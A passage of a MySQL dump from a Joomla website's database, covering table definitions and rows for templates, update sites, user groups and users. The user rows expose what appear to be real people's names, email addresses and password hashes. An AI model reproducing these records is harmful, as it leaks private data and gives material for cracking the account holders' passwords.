`metakey` varchar(1024) NOT NULL COMMENT 'The meta keywords for the page.', `metadata` varchar(2048) NOT NULL COMMENT 'JSON encoded metadata properties.', `created_user_id` int(10) unsigned NOT NULL DEFAULT '0', `created_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `created_by_alias` varchar(255) NOT NULL DEFAULT '', `modified_user_id` int(10) unsigned NOT NULL DEFAULT '0', `modified_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `images` text NOT NULL, `urls` text NOT NULL, `hits` int(10) unsigned NOT NULL DEFAULT '0', `language` char(7) NOT NULL, `version` int(10) unsigned NOT NULL DEFAULT '1', `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', PRIMARY KEY (`id`), KEY `tag_idx` (`published`,`access`), KEY `idx_access` (`access`), KEY `idx_checkout` (`checked_out`), KEY `idx_path` (`path`), KEY `idx_left_right` (`lft`,`rgt`), KEY `idx_alias` (`alias`), KEY `idx_language` (`language`) ) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_tags` -- LOCK TABLES `jos_tags` WRITE; /*!40000 ALTER TABLE `jos_tags` DISABLE KEYS */; INSERT INTO `jos_tags` VALUES (1,0,0,1,0,'','ROOT','root','','',1,0,'0000-00-00 00:00:00',1,'{}','','','',0,'2011-01-01 00:00:01','',0,'0000-00-00 00:00:00','','',0,'*',1,'0000-00-00 00:00:00','0000-00-00 00:00:00'); /*!40000 ALTER TABLE `jos_tags` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_template_styles` -- DROP TABLE IF EXISTS `jos_template_styles`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_template_styles` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT, `template` varchar(50) NOT NULL DEFAULT '', `client_id` tinyint(1) unsigned NOT NULL DEFAULT '0', `home` char(7) NOT NULL DEFAULT '0', `title` varchar(255) NOT NULL DEFAULT '', `params` text NOT NULL, PRIMARY KEY (`id`), KEY `idx_template` (`template`), KEY `idx_home` (`home`) ) ENGINE=InnoDB AUTO_INCREMENT=12 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_template_styles` -- LOCK TABLES `jos_template_styles` WRITE; /*!40000 ALTER TABLE `jos_template_styles` DISABLE KEYS */; INSERT INTO `jos_template_styles` VALUES (2,'bluestork',1,'0','Bluestork - Default','{\"useRoundedCorners\":\"1\",\"showSiteName\":\"0\"}'),(3,'atomic',0,'0','Atomic - Default','{}'),(4,'beez_20',0,'0','Beez2 - Default','{\"wrapperSmall\":\"53\",\"wrapperLarge\":\"72\",\"logo\":\"images\\/joomla_black.gif\",\"sitetitle\":\"Joomla!\",\"sitedescription\":\"Open Source Content Management\",\"navposition\":\"left\",\"templatecolor\":\"personal\",\"html5\":\"0\"}'),(5,'hathor',1,'0','Hathor - Default','{\"showSiteName\":\"0\",\"colourChoice\":\"\",\"boldText\":\"0\"}'),(6,'beez5',0,'0','Beez5 - Default-Fruit Shop','{\"wrapperSmall\":\"53\",\"wrapperLarge\":\"72\",\"logo\":\"images\\/sampledata\\/fruitshop\\/fruits.gif\",\"sitetitle\":\"Matuna Market \",\"sitedescription\":\"Fruit Shop Sample Site\",\"navposition\":\"left\",\"html5\":\"0\"}'),(7,'hh1',0,'0','HH1 - Default','[]'),(8,'protostar',0,'0','protostar - Default','{\"templateColor\":\"\",\"logoFile\":\"\",\"googleFont\":\"1\",\"googleFontName\":\"Open+Sans\",\"fluidContainer\":\"0\"}'),(9,'isis',1,'1','isis - Default','{\"templateColor\":\"\",\"logoFile\":\"\"}'),(10,'beez3',0,'0','beez3 - Default','{\"wrapperSmall\":53,\"wrapperLarge\":72,\"logo\":\"\",\"sitetitle\":\"\",\"sitedescription\":\"\",\"navposition\":\"center\",\"bootstrap\":\"\",\"templatecolor\":\"nature\",\"headerImage\":\"\",\"backgroundcolor\":\"#eee\"}'),(11,'hh2',0,'1','HH2 - Default','[]'); /*!40000 ALTER TABLE `jos_template_styles` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_ucm_base` -- DROP TABLE IF EXISTS `jos_ucm_base`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_ucm_base` ( `ucm_id` int(10) unsigned NOT NULL, `ucm_item_id` int(10) NOT NULL, `ucm_type_id` int(11) NOT NULL, `ucm_language_id` int(11) NOT NULL, PRIMARY KEY (`ucm_id`), KEY `idx_ucm_item_id` (`ucm_item_id`), KEY `idx_ucm_type_id` (`ucm_type_id`), KEY `idx_ucm_language_id` (`ucm_language_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_ucm_base` -- LOCK TABLES `jos_ucm_base` WRITE; /*!40000 ALTER TABLE `jos_ucm_base` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_ucm_base` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_ucm_content` -- DROP TABLE IF EXISTS `jos_ucm_content`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_ucm_content` ( `core_content_id` int(10) unsigned NOT NULL AUTO_INCREMENT, `core_type_alias` varchar(255) NOT NULL DEFAULT '' COMMENT 'FK to the content types table', `core_title` varchar(255) NOT NULL, `core_alias` varchar(255) CHARACTER SET utf8 COLLATE utf8_bin NOT NULL DEFAULT '', `core_body` mediumtext NOT NULL, `core_state` tinyint(1) NOT NULL DEFAULT '0', `core_checked_out_time` varchar(255) NOT NULL DEFAULT '', `core_checked_out_user_id` int(10) unsigned NOT NULL DEFAULT '0', `core_access` int(10) unsigned NOT NULL DEFAULT '0', `core_params` text NOT NULL, `core_featured` tinyint(4) unsigned NOT NULL DEFAULT '0', `core_metadata` varchar(2048) NOT NULL COMMENT 'JSON encoded metadata properties.', `core_created_user_id` int(10) unsigned NOT NULL DEFAULT '0', `core_created_by_alias` varchar(255) NOT NULL DEFAULT '', `core_created_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `core_modified_user_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'Most recent user that modified', `core_modified_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `core_language` char(7) NOT NULL, `core_publish_up` datetime NOT NULL, `core_publish_down` datetime NOT NULL, `core_content_item_id` int(10) unsigned DEFAULT NULL COMMENT 'ID from the individual type table', `asset_id` int(10) unsigned DEFAULT NULL COMMENT 'FK to the #__assets table.', `core_images` text NOT NULL, `core_urls` text NOT NULL, `core_hits` int(10) unsigned NOT NULL DEFAULT '0', `core_version` int(10) unsigned NOT NULL DEFAULT '1', `core_ordering` int(11) NOT NULL DEFAULT '0', `core_metakey` text NOT NULL, `core_metadesc` text NOT NULL, `core_catid` int(10) unsigned NOT NULL DEFAULT '0', `core_xreference` varchar(50) NOT NULL COMMENT 'A reference to enable linkages to external data sets.', `core_type_id` int(10) unsigned DEFAULT NULL, PRIMARY KEY (`core_content_id`), KEY `tag_idx` (`core_state`,`core_access`), KEY `idx_access` (`core_access`), KEY `idx_alias` (`core_alias`), KEY `idx_language` (`core_language`), KEY `idx_title` (`core_title`), KEY `idx_modified_time` (`core_modified_time`), KEY `idx_created_time` (`core_created_time`), KEY `idx_content_type` (`core_type_alias`), KEY `idx_core_modified_user_id` (`core_modified_user_id`), KEY `idx_core_checked_out_user_id` (`core_checked_out_user_id`), KEY `idx_core_created_user_id` (`core_created_user_id`), KEY `idx_core_type_id` (`core_type_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Contains core content data in name spaced fields'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_ucm_content` -- LOCK TABLES `jos_ucm_content` WRITE; /*!40000 ALTER TABLE `jos_ucm_content` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_ucm_content` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_ucm_history` -- DROP TABLE IF EXISTS `jos_ucm_history`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_ucm_history` ( `version_id` int(10) unsigned NOT NULL AUTO_INCREMENT, `ucm_item_id` int(10) unsigned NOT NULL, `ucm_type_id` int(10) unsigned NOT NULL, `version_note` varchar(255) NOT NULL DEFAULT '' COMMENT 'Optional version name', `save_date` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `editor_user_id` int(10) unsigned NOT NULL DEFAULT '0', `character_count` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'Number of characters in this version.', `sha1_hash` varchar(50) NOT NULL DEFAULT '' COMMENT 'SHA1 hash of the version_data column.', `version_data` mediumtext NOT NULL COMMENT 'json-encoded string of version data', `keep_forever` tinyint(4) NOT NULL DEFAULT '0' COMMENT '0=auto delete; 1=keep', PRIMARY KEY (`version_id`), KEY `idx_ucm_item_id` (`ucm_type_id`,`ucm_item_id`), KEY `idx_save_date` (`save_date`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_ucm_history` -- LOCK TABLES `jos_ucm_history` WRITE; /*!40000 ALTER TABLE `jos_ucm_history` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_ucm_history` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_update_sites` -- DROP TABLE IF EXISTS `jos_update_sites`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_update_sites` ( `update_site_id` int(11) NOT NULL AUTO_INCREMENT, `name` varchar(100) DEFAULT '', `type` varchar(20) DEFAULT '', `location` text NOT NULL, `enabled` int(11) DEFAULT '0', `last_check_timestamp` bigint(20) DEFAULT '0', `extra_query` varchar(1000) DEFAULT '', PRIMARY KEY (`update_site_id`) ) ENGINE=InnoDB AUTO_INCREMENT=8 DEFAULT CHARSET=utf8 COMMENT='Update Sites'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_update_sites` -- LOCK TABLES `jos_update_sites` WRITE; /*!40000 ALTER TABLE `jos_update_sites` DISABLE KEYS */; INSERT INTO `jos_update_sites` VALUES (1,'Joomla Core','collection','http://update.joomla.org/core/sts/list_sts.xml',1,1510081169,''),(2,'Joomla Extension Directory','collection','http://update.joomla.org/jed/list.xml',1,1510081169,''),(3,'JCE Editor Updates','extension','https://www.joomlacontenteditor.net/index.php?option=com_updates&view=update&format=xml&id=1',0,0,''),(4,'Accredited Joomla! Translations','collection','http://update.joomla.org/language/translationlist_3.xml',1,0,''),(5,'ALFContact Updates','extension','http://updates.alfsoft.com/alfcontact.xml',1,0,''),(6,'Xmap Update Site','extension','https://raw.github.com/guilleva/Xmap/master/xmap-update.xml',1,0,''),(7,'SimpleCalendar Updates','extension','http://software.albonico.ch/component/simplevalidate?view=update&format=xml&id=1',0,0,''); /*!40000 ALTER TABLE `jos_update_sites` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_update_sites_extensions` -- DROP TABLE IF EXISTS `jos_update_sites_extensions`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_update_sites_extensions` ( `update_site_id` int(11) NOT NULL DEFAULT '0', `extension_id` int(11) NOT NULL DEFAULT '0', PRIMARY KEY (`update_site_id`,`extension_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Links extensions to update sites'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_update_sites_extensions` -- LOCK TABLES `jos_update_sites_extensions` WRITE; /*!40000 ALTER TABLE `jos_update_sites_extensions` DISABLE KEYS */; INSERT INTO `jos_update_sites_extensions` VALUES (1,700),(2,700),(3,10009),(4,600),(5,10028),(6,10013),(7,10043); /*!40000 ALTER TABLE `jos_update_sites_extensions` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_updates` -- DROP TABLE IF EXISTS `jos_updates`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_updates` ( `update_id` int(11) NOT NULL AUTO_INCREMENT, `update_site_id` int(11) DEFAULT '0', `extension_id` int(11) DEFAULT '0', `name` varchar(100) DEFAULT '', `description` text NOT NULL, `element` varchar(100) DEFAULT '', `type` varchar(20) DEFAULT '', `folder` varchar(20) DEFAULT '', `client_id` tinyint(3) DEFAULT '0', `version` varchar(32) DEFAULT '', `data` text NOT NULL, `detailsurl` text NOT NULL, `infourl` text NOT NULL, `extra_query` varchar(1000) DEFAULT '', PRIMARY KEY (`update_id`) ) ENGINE=InnoDB AUTO_INCREMENT=3 DEFAULT CHARSET=utf8 COMMENT='Available Updates'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_updates` -- LOCK TABLES `jos_updates` WRITE; /*!40000 ALTER TABLE `jos_updates` DISABLE KEYS */; INSERT INTO `jos_updates` VALUES (1,1,700,'Joomla','','joomla','file','',0,'3.8.2','','https://update.joomla.org/core/sts/extension_sts.xml','',''),(2,1,700,'Joomla','','joomla','file','',0,'3.6.5','','https://update.joomla.org/core/sts/extension_sts.xml','',''); /*!40000 ALTER TABLE `jos_updates` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_user_keys` -- DROP TABLE IF EXISTS `jos_user_keys`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_user_keys` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT, `user_id` varchar(255) NOT NULL, `token` varchar(255) NOT NULL, `series` varchar(255) NOT NULL, `invalid` tinyint(4) NOT NULL, `time` varchar(200) NOT NULL, `uastring` varchar(255) NOT NULL, PRIMARY KEY (`id`), UNIQUE KEY `series` (`series`), UNIQUE KEY `series_2` (`series`), UNIQUE KEY `series_3` (`series`), KEY `user_id` (`user_id`) ) ENGINE=InnoDB AUTO_INCREMENT=2 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_user_keys` -- LOCK TABLES `jos_user_keys` WRITE; /*!40000 ALTER TABLE `jos_user_keys` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_user_keys` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_user_notes` -- DROP TABLE IF EXISTS `jos_user_notes`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_user_notes` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT, `user_id` int(10) unsigned NOT NULL DEFAULT '0', `catid` int(10) unsigned NOT NULL DEFAULT '0', `subject` varchar(100) NOT NULL DEFAULT '', `body` text NOT NULL, `state` tinyint(3) NOT NULL DEFAULT '0', `checked_out` int(10) unsigned NOT NULL DEFAULT '0', `checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `created_user_id` int(10) unsigned NOT NULL DEFAULT '0', `created_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `modified_user_id` int(10) unsigned NOT NULL, `modified_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `review_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', PRIMARY KEY (`id`), KEY `idx_user_id` (`user_id`), KEY `idx_category_id` (`catid`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_user_notes` -- LOCK TABLES `jos_user_notes` WRITE; /*!40000 ALTER TABLE `jos_user_notes` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_user_notes` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_user_profiles` -- DROP TABLE IF EXISTS `jos_user_profiles`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_user_profiles` ( `user_id` int(11) NOT NULL, `profile_key` varchar(100) NOT NULL, `profile_value` varchar(255) NOT NULL, `ordering` int(11) NOT NULL DEFAULT '0', UNIQUE KEY `idx_user_id_profile_key` (`user_id`,`profile_key`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8 COMMENT='Simple user profile storage table'; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_user_profiles` -- LOCK TABLES `jos_user_profiles` WRITE; /*!40000 ALTER TABLE `jos_user_profiles` DISABLE KEYS */; /*!40000 ALTER TABLE `jos_user_profiles` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_user_usergroup_map` -- DROP TABLE IF EXISTS `jos_user_usergroup_map`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_user_usergroup_map` ( `user_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'Foreign Key to #__users.id', `group_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'Foreign Key to #__usergroups.id', PRIMARY KEY (`user_id`,`group_id`) ) ENGINE=InnoDB DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_user_usergroup_map` -- LOCK TABLES `jos_user_usergroup_map` WRITE; /*!40000 ALTER TABLE `jos_user_usergroup_map` DISABLE KEYS */; INSERT INTO `jos_user_usergroup_map` VALUES (46,8),(47,8),(48,6),(48,7),(50,7),(50,8),(51,7),(53,3),(53,4),(53,5),(55,2),(56,2),(57,2),(57,3),(57,4),(57,5),(57,6),(57,7),(58,2),(59,2),(60,2),(61,2),(62,2),(63,2),(64,2),(65,2),(66,2),(67,2),(68,2),(69,2),(70,2),(71,2),(72,2),(73,2),(74,2),(75,2),(76,2),(77,2),(78,2),(79,2),(80,2),(81,2),(82,2),(83,2),(84,2),(85,2),(86,2),(87,2),(88,2),(89,2),(90,2),(91,2),(92,2),(93,2),(94,2),(95,2),(96,2),(97,2),(98,2),(99,2),(100,2),(101,2),(102,2),(103,2),(104,2),(105,2),(106,2),(107,2),(108,2),(109,2),(110,2),(111,2),(112,2),(113,2),(114,2),(115,2),(116,2),(117,2),(118,2),(119,2),(120,2),(121,2),(122,2),(123,2),(124,2),(125,2),(126,2),(127,2),(128,2),(129,2),(130,2),(131,2),(132,2),(133,2),(134,2),(135,2),(136,2),(137,2),(138,2),(139,2),(140,2),(141,2),(142,2),(143,2),(144,2),(145,2),(146,2),(147,2),(148,2),(149,2),(150,2),(151,2),(152,2),(153,2),(154,2),(155,2),(156,2),(157,2),(158,2),(159,2),(160,2),(161,2),(162,2),(163,2),(164,2),(165,2),(166,2),(167,2),(168,2),(169,2),(170,2),(171,2),(172,2),(173,2),(174,2),(175,2),(176,2),(177,2),(178,2),(179,2),(180,2),(181,2),(182,2),(183,2),(184,2),(185,2),(186,2),(187,2),(188,2),(189,2),(190,2),(191,2),(192,2),(193,2),(194,2),(195,2),(196,2),(197,2),(198,2),(199,2),(200,2),(201,2),(202,2),(203,2),(204,2),(205,2),(206,2),(207,2),(208,2),(209,2),(210,2),(211,2),(212,2),(213,2),(214,2),(215,2),(216,2),(217,2),(218,2),(219,2),(220,2),(221,2),(222,2),(223,2),(224,2),(225,2),(226,2),(227,2),(228,2),(229,2),(230,2),(231,2),(232,2),(233,2),(234,2),(235,2),(236,2),(237,2),(238,2),(239,2),(240,2),(241,2),(242,2),(243,2),(244,2),(245,2),(246,2),(247,2),(248,2),(249,2),(250,2),(251,2),(252,2),(253,2),(254,2),(255,2),(256,2),(257,2),(258,2),(259,2),(260,2),(261,2),(262,2),(263,2),(264,2),(265,2),(266,2),(267,2),(268,2),(269,2),(270,2),(271,2),(272,2),(273,2),(274,2),(275,2),(276,2),(277,2),(278,2),(279,2),(280,2),(281,2),(282,2),(283,2),(284,2),(285,2),(286,2),(287,2),(288,2),(289,2),(290,2),(291,2),(292,2),(293,2),(294,2),(295,2),(296,2),(297,2),(298,2),(299,2),(300,2),(301,2),(302,2),(303,2),(304,2),(305,2),(306,2),(307,2),(308,2),(309,2),(310,2),(311,2),(312,2),(313,2),(314,2),(315,2),(316,2),(317,2),(318,2),(319,2),(320,2),(321,2),(322,2),(323,2),(324,2),(325,2),(326,2),(327,2),(328,2),(329,2),(330,2),(331,2),(332,2),(333,2),(334,2),(335,2),(336,2),(337,2),(338,2),(339,2),(340,2),(341,2),(342,2),(343,2),(344,2),(345,2),(346,2),(347,2),(348,2),(349,2),(350,2),(351,2),(352,2),(353,2),(354,2),(355,2),(356,2),(357,2),(358,2),(359,2),(360,2),(361,2),(362,2),(363,2),(364,2),(365,2),(366,2),(367,2),(368,2),(369,2),(370,2),(371,2),(372,2),(373,2),(374,2),(375,2),(376,2),(377,2),(378,2),(379,2),(380,2),(381,2),(382,2),(383,2),(384,2),(385,2),(386,2),(387,2),(388,2),(389,2),(390,2),(391,2),(392,2),(393,2),(394,2),(395,2),(396,2),(397,2),(398,2),(399,2),(400,2),(401,2),(402,2),(403,2),(404,2),(405,2),(406,2),(407,2),(408,2),(409,2),(410,2),(411,2),(412,2),(413,2),(414,2),(415,2),(416,2),(417,2),(418,2),(419,2),(420,2),(421,2),(422,2),(423,2),(424,2),(425,2),(426,2),(427,2),(428,2); /*!40000 ALTER TABLE `jos_user_usergroup_map` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_usergroups` -- DROP TABLE IF EXISTS `jos_usergroups`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_usergroups` ( `id` int(10) unsigned NOT NULL AUTO_INCREMENT COMMENT 'Primary Key', `parent_id` int(10) unsigned NOT NULL DEFAULT '0' COMMENT 'Adjacency List Reference Id', `lft` int(11) NOT NULL DEFAULT '0' COMMENT 'Nested set lft.', `rgt` int(11) NOT NULL DEFAULT '0' COMMENT 'Nested set rgt.', `title` varchar(100) NOT NULL DEFAULT '', PRIMARY KEY (`id`), UNIQUE KEY `idx_usergroup_parent_title_lookup` (`parent_id`,`title`), KEY `idx_usergroup_title_lookup` (`title`), KEY `idx_usergroup_adjacency_lookup` (`parent_id`), KEY `idx_usergroup_nested_set_lookup` (`lft`,`rgt`) USING BTREE ) ENGINE=InnoDB AUTO_INCREMENT=9 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_usergroups` -- LOCK TABLES `jos_usergroups` WRITE; /*!40000 ALTER TABLE `jos_usergroups` DISABLE KEYS */; INSERT INTO `jos_usergroups` VALUES (1,0,1,20,'Public'),(2,1,6,17,'Registered'),(3,2,7,14,'Author'),(4,3,8,11,'Editor'),(5,4,9,10,'Publisher'),(6,1,2,5,'Manager'),(7,6,3,4,'Administrator'),(8,1,18,19,'Super Users'); /*!40000 ALTER TABLE `jos_usergroups` ENABLE KEYS */; UNLOCK TABLES; -- -- Table structure for table `jos_users` -- DROP TABLE IF EXISTS `jos_users`; /*!40101 SET @saved_cs_client = @@character_set_client */; /*!40101 SET character_set_client = utf8 */; CREATE TABLE `jos_users` ( `id` int(11) NOT NULL AUTO_INCREMENT, `name` varchar(255) NOT NULL DEFAULT '', `username` varchar(150) NOT NULL DEFAULT '', `email` varchar(100) NOT NULL DEFAULT '', `password` varchar(100) NOT NULL DEFAULT '', `block` tinyint(4) NOT NULL DEFAULT '0', `sendEmail` tinyint(4) DEFAULT '0', `registerDate` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `lastvisitDate` datetime NOT NULL DEFAULT '0000-00-00 00:00:00', `activation` varchar(100) NOT NULL DEFAULT '', `params` text NOT NULL, `lastResetTime` datetime NOT NULL DEFAULT '0000-00-00 00:00:00' COMMENT 'Date of last password reset', `resetCount` int(11) NOT NULL DEFAULT '0' COMMENT 'Count of password resets since lastResetTime', `otpKey` varchar(1000) NOT NULL DEFAULT '' COMMENT 'Two factor authentication encrypted keys', `otep` varchar(1000) NOT NULL DEFAULT '' COMMENT 'One time emergency passwords', PRIMARY KEY (`id`), KEY `idx_name` (`name`), KEY `idx_block` (`block`), KEY `username` (`username`), KEY `email` (`email`) ) ENGINE=InnoDB AUTO_INCREMENT=429 DEFAULT CHARSET=utf8; /*!40101 SET character_set_client = @saved_cs_client */; -- -- Dumping data for table `jos_users` -- LOCK TABLES `jos_users` WRITE; /*!40000 ALTER TABLE `jos_users` DISABLE KEYS */; INSERT INTO `jos_users` VALUES (46,'Renzy','renzy','renzy@memije.info','561a966e56e9174dac8044476172b7be:Ju3Vogpccg28HJEU3VtY6WabIOOIQpsG',1,1,'2012-03-20 12:59:06','2013-09-26 14:37:35','','{\"admin_style\":\"\",\"admin_language\":\"\",\"language\":\"\",\"editor\":\"jce\",\"helpsite\":\"\",\"timezone\":\"\"}','0000-00-00 00:00:00',0,'',''),(47,'mikonsulting','mikonsulting','richardtibang@gmail.com','a775cd3f9962d260fd00579846c5214b:FEzpJe4bw9gPbaeD3PUHGBKXh2Jovv4M',1,1,'2013-05-29 18:21:16','2013-12-01 13:28:19','','{\"admin_style\":\"\",\"admin_language\":\"\",\"language\":\"\",\"editor\":\"\",\"helpsite\":\"\",\"timezone\":\"\"}','0000-00-00 00:00:00',0,'',''),(48,'hallcrest','hallcrest','hallcrest@hallcrest.org','04940d42ba7888a82143785fa1ed1959:Bc5RwkOOmBuKfRb0Gn1xMOFLuoalxHRx',1,0,'2013-06-13 04:57:11','0000-00-00 00:00:00','','{\"admin_style\":\"\",\"admin_language\":\"\",\"language\":\"\",\"editor\":\"\",\"helpsite\":\"\",\"timezone\":\"\"}','0000-00-00 00:00:00',0,'',''),(50,'John Aranha','jaranha','john.aranha@gmail.com','$2y$10$U0sENkjksFr8HwYsINJWOeUj5u4QAWzc1PAaBCq65ghFZe7iEefxG',0,0,'2013-10-12 16:22:30','2018-04-15 23:03:53','','{\"admin_style\":\"\",\"admin_language\":\"\",\"language\":\"\",\"editor\":\"\",\"helpsite\":\"\",\"timezone\":\"\"}','0000-00-00 00:00:00',0,'',''),(51,'richard','richard','chardtc@yahoo.com','c13ac402f279258765710c69ad23299d:eUBaknatq2AFIQ8ldFWUa7Zf6zIwhVoR',1,0,'2013-11-30 15:54:02','2013-11-30 15:55:31','','{\"admin_style\":\"\",\"admin_language\":\"\",\"language\":\"\",\"editor\":\"\",\"helpsite\":\"\",\"timezone\":\"\"}','0000-00-00 00:00:00',0,'',''),(53,'tw','twethington','travis.wethington@gmail.com','0490fa409741be69e005737797ec7dc3:3GaOimiqda6opHWlCojHZBvArRfqKbj6',0,0,'2015-02-22 00:47:26','2015-05-11 23:32:35','','{\"admin_style\":\"\",\"admin_language\":\"\",\"language\":\"\",\"editor\":\"\",\"helpsite\":\"\",\"timezone\":\"\"}','0000-00-00 00:00:00',0,'',''),(55,'test','alex204291','alex204291@mailer.ygto.com','f733adf91ae2654945aacb71ad6e6665:cuiNNkxaz2RS0Q6tuXYsKGxBkG2bx4i1',1,0,'2016-09-12 07:41:17','0000-00-00 00:00:00','99a71bf9fb2d2a69ecd4e245a681d132','{}','0000-00-00 00:00:00',0,'',''),(56,'test','alex325000','alex325000@mailer.ygto.com','2c5f3dc87a0b3ea9ae5c6a2242b0e2fa:q3iiNDknvBDeN1AAMxCbRs7NKydCYNjD',1,0,'2016-09-14 11:38:12','0000-00-00 00:00:00','a12c1c82ef9f97837dc4380e2884b15b','{}','0000-00-00 00:00:00',0,'',''),(57,'Marie Ternieden','mternieden','mdternieden@yahoo.com','$2y$10$DnRx1Ax4pO6wrTSjvtVVa.Chrfk/14V4e2FyeEmdt7sk0b4aITiJu',0,0,'2017-01-07 21:19:49','2017-11-07 18:59:23','','{\"admin_style\":\"\",\"admin_language\":\"\",\"language\":\"\",\"editor\":\"\",\"helpsite\":\"\",\"timezone\":\"\"}','2017-11-07 18:56:09',1,'',''),(58,'jdebugger','jdebugger','missfepemen10@mail.ru','$2y$10$WOMnjD9mUdYqQL1GydozVOz0dAITqwlZkVVmXguCQt0Cw/v319YKi',0,0,'2017-06-27 14:26:04','0000-00-00 00:00:00','','{}','0000-00-00 00:00:00',0,'',''),(59,'Kim','windoloco1976','xemugoh@yandex.ua','$2y$10$CPlWfXbFz93ijJxb1DhF9uWDohSRgz0UXi2K3U/kklHKxULoBPaVS',1,0,'2017-07-11 16:03:01','0000-00-00 00:00:00','1d20adc29ad8739040c000de26fc48dc','{}','0000-00-00 00:00:00',0,'',''),(60,'joomlahelp','joomlahelp','kuzmina0803@mail.ru','$2y$10$Kz1./HIw1jcBcUriLgbG9uMiB3LVIxTwNE6cAssk8IY91KtCDbwoq',0,0,'2017-10-09 19:56:04','0000-00-00 00:00:00','','{}','0000-00-00 00:00:00',0,'',''),(61,'Xiaomeng','tinggertibeg1981','425536360119100@mail.ru','$2y$10$zJh.xPqzsaFNBrQfqFKxmu5.WJHGR5J75JjKNsTHkDAsltkAyYuCa',1,0,'2017-10-19 03:25:15','0000-00-00 00:00:00','4069810775cc2b5a5abe15094fb2cb41','{}','0000-00-00 00:00:00',0,'',''),(62,'erroeraystim','_$hallcrestheights_cms$_','SkoblevaInessa@bk.ru','$2y$10$T07UDpYinhGxR6i7MYUCOul64HtkX.Lt1Z35xvfyutUWx6K/iUdB.',1,0,'2017-11-07 02:44:50','0000-00-00 